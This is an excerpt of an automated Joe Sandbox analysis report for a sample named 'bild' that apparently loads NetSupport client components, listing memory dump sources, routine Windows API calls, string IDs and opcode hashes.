                                                                                                      • Associated: 00000001.00000002.3511098641.000000006C750000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511160154.000000006C799000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511206673.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_6c750000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: inet_ntoa
                                                                                                      • String ID: gfff
                                                                                                      • API String ID: 1879540557-1553575800
                                                                                                      • Opcode ID: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                                                      • Instruction ID: f9a492876a74bc7b00b24860e44c9444f5e4c5f9a8f37e3881bec0475e85a473
                                                                                                      • Opcode Fuzzy Hash: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                                                      • Instruction Fuzzy Hash: BA11AB226082D78BC3168A2FB8602C6BFD9DF96240B1C4579D8C9CB701CA21F81AC7D0
                                                                                                      APIs
                                                                                                      • GetDriveTypeA.KERNEL32(?), ref: 11026B6D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: DriveType
                                                                                                      • String ID: ?:\
                                                                                                      • API String ID: 338552980-2533537817
                                                                                                      • Opcode ID: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
                                                                                                      • Instruction ID: c0198090b602517e4922a9d0df48f1c050a77905515f879100581957a4b6d58d
                                                                                                      • Opcode Fuzzy Hash: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
                                                                                                      • Instruction Fuzzy Hash: 64F09065C083DA2AEB23DE608844596BFE84B463A8F5488D9DCE887541D165E1C58791
                                                                                                      APIs
                                                                                                        • Part of subcall function 110ED160: RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
                                                                                                      • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED1BC
                                                                                                        • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                                      Strings
                                                                                                      • Error %d Opening regkey %s, xrefs: 110ED1CA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpenwvsprintf
                                                                                                      • String ID: Error %d Opening regkey %s
                                                                                                      • API String ID: 1772833024-3994271378
                                                                                                      • Opcode ID: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
                                                                                                      • Instruction ID: 33cf1931661e2960d377c619dd89904b97ea319b13ae6f8f8dcb9591a9c6775e
                                                                                                      • Opcode Fuzzy Hash: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
                                                                                                      • Instruction Fuzzy Hash: 60E0927A6012187FD210961B9C89F9BBB2DDB856A4F000069FD1487201C972EC1082B0
                                                                                                      APIs
                                                                                                      • RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
                                                                                                        • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                                      Strings
                                                                                                      • Error %d closing regkey %x, xrefs: 110ED17D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Closewvsprintf
                                                                                                      • String ID: Error %d closing regkey %x
                                                                                                      • API String ID: 843752472-892920262
                                                                                                      • Opcode ID: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
                                                                                                      • Instruction ID: 72b2cf3cdd4b8fd577e25b07e2838f9a8e734d144b1f96517ba84771a8eadcbb
                                                                                                      • Opcode Fuzzy Hash: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
                                                                                                      • Instruction Fuzzy Hash: 4EE08679A022126BD3289A1EAC18F5BB6E8DFC4300F1604ADF850C3240DA70D8018664
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(NSMTRACE,?,1102DE54,11026580,026AB878,?,?,?,00000100,?,?,00000009), ref: 111463E9
                                                                                                        • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: HandleLibraryLoadModule
                                                                                                      • String ID: NSMTRACE
                                                                                                      • API String ID: 4133054770-4175627554
                                                                                                      • Opcode ID: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
                                                                                                      • Instruction ID: cf49eb18fee32400038a48a9d82a087192b912de878353ac6c822cd252c7dc11
                                                                                                      • Opcode Fuzzy Hash: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
                                                                                                      • Instruction Fuzzy Hash: 50D05EB520033BCFDB489F7995B4269F7EAAB4CA1D3540075E469C2A07EBB0D848C714
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(psapi.dll,?,110302C4), ref: 11025CD8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad
                                                                                                      • String ID: psapi.dll
                                                                                                      • API String ID: 1029625771-80456845
                                                                                                      • Opcode ID: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
                                                                                                      • Instruction ID: d2f0b82a95d6fc878682dccaf19b7a180456f678ee46f3fe844c8dbdc6f5fb44
                                                                                                      • Opcode Fuzzy Hash: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
                                                                                                      • Instruction Fuzzy Hash: C9E001B1A11B248FC3B4CF3AA844642FAF0BB18A103118A3ED4AEC3A00E330A5448F80
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(psapi.dll,?,6C758DC8), ref: 6C754F78
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3511114217.000000006C751000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C750000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3511098641.000000006C750000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511160154.000000006C799000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511206673.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_6c750000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad
                                                                                                      • String ID: psapi.dll
                                                                                                      • API String ID: 1029625771-80456845
                                                                                                      • Opcode ID: f070a6009d7d4a138757ab4d209c46e54eb607f55122ffc0e49df2958fcbaee4
                                                                                                      • Instruction ID: a2eaea7db4f3301d7c7fbcb3adb61e8583454f212d6f68fed551fbf394c6825c
                                                                                                      • Opcode Fuzzy Hash: f070a6009d7d4a138757ab4d209c46e54eb607f55122ffc0e49df2958fcbaee4
                                                                                                      • Instruction Fuzzy Hash: 29E001B1A11B108F83B0CF3AA504642BAF0BB0D6503118E3E90AEC3A00E330AA858F80
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102EF80,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 11014F8E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad
                                                                                                      • String ID: nslsp.dll
                                                                                                      • API String ID: 1029625771-3933918195
                                                                                                      • Opcode ID: 09252c17772e29db9c623e4f38910c48fc62fdaa09ce42d8982732414e450a92
                                                                                                      • Instruction ID: 60eb6736f29bf142f24d4cfcc231741db50fe0cc1946b431100be770a733e412
                                                                                                      • Opcode Fuzzy Hash: 09252c17772e29db9c623e4f38910c48fc62fdaa09ce42d8982732414e450a92
                                                                                                      • Instruction Fuzzy Hash: E7C092B17152388FE3685F7CAC085D2FAE4EB48A91351986EE4B5D3308E6B09C40CFE4
                                                                                                      APIs
                                                                                                      • _memset.LIBCMT ref: 11074E1F
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,11194245,?), ref: 11074E89
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary_memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1654520187-0
                                                                                                      • Opcode ID: f6776980cd6796a903c6ab2b2bc3f730c5ac8cd4990655cc289426affdaed8f3
                                                                                                      • Instruction ID: 144a06a128bfe4de4bcaa8ee3b5ec3a734aa963de7831f9780c3e5d6e94517af
                                                                                                      • Opcode Fuzzy Hash: f6776980cd6796a903c6ab2b2bc3f730c5ac8cd4990655cc289426affdaed8f3
                                                                                                      • Instruction Fuzzy Hash: 6E218376D04228A7D710DA99EC41FEFFBACEB44325F4045AAE909D7200D7315A55CBE1
                                                                                                      APIs
                                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                      • std::exception::exception.LIBCMT ref: 1105FD93
                                                                                                      • __CxxThrowException@8.LIBCMT ref: 1105FDA8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 1338273076-0
                                                                                                      • Opcode ID: 008f8e93dd07e0136ec59ea579b5f73905d9fad81b76f295f420d5e427868693
                                                                                                      • Instruction ID: 65be3d9b06008521879bde957bfb15225efad016ffb254945ac63f30ffb56918
                                                                                                      • Opcode Fuzzy Hash: 008f8e93dd07e0136ec59ea579b5f73905d9fad81b76f295f420d5e427868693
                                                                                                      • Instruction Fuzzy Hash: F5117FBA900619ABC710CF99C940ADAF7F8FB48614F10862EE91997740E774B900CBE1
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _malloc_memmove
                                                                                                      • String ID:
                                                                                                      • API String ID: 1183979061-0
                                                                                                      • Opcode ID: 6759e9627eb897b24cf992b2bdc0114f61227cb54e7c028b4573e7a9add283cd
                                                                                                      • Instruction ID: db33143030e4a9298ca15ccbefe9b49d771c33472961b073c023ff9ae0ea679a
                                                                                                      • Opcode Fuzzy Hash: 6759e9627eb897b24cf992b2bdc0114f61227cb54e7c028b4573e7a9add283cd
                                                                                                      • Instruction Fuzzy Hash: 98F0F47AE002666F9741CF2C9844896FBDCDF8A158314C4A2E999CB301D671EC0687E0
                                                                                                      APIs
                                                                                                      • _memset.LIBCMT ref: 110883EF
                                                                                                      • InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070993,00000000,00000000,1118201E,000000FF), ref: 11088460
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalInitializeSection_memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 453477542-0
                                                                                                      • Opcode ID: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
                                                                                                      • Instruction ID: 54b2584c526ac61f8aa3306390e259e673957fd90be6398fea32980b523eb801
                                                                                                      • Opcode Fuzzy Hash: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
